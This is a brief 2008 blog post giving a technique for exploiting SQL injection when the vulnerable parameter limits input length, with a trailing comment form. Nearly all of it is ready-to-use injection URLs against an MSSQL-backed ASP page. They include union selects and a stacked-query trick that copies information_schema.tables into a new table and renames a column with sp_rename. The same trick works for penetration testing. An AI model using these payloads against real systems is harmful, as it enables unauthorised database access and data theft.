Input Length restriction in SQL Injections

July 23, 2008

Often While exploiting SQL Injections, one encounters restrictions on the length of input a vulnerable parameter can take. e.g

  • http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,@@version– works
  • http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,table_name from information_schema.tables– may not work(too long)

One solution to this problem could be:-

  • http://myhost/vuln.asp?vuln=a';select * into xx from information_schema.tables–
  • http://myhost/vuln.asp?vuln=a';exec sp_rename 'xx.table_name','xx.tn'–
  • http://myhost/vuln.asp?vuln=a'union all select 1,2,3,4,5,6,tn from xx–

 Thanks Ferruh for the help

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Trackback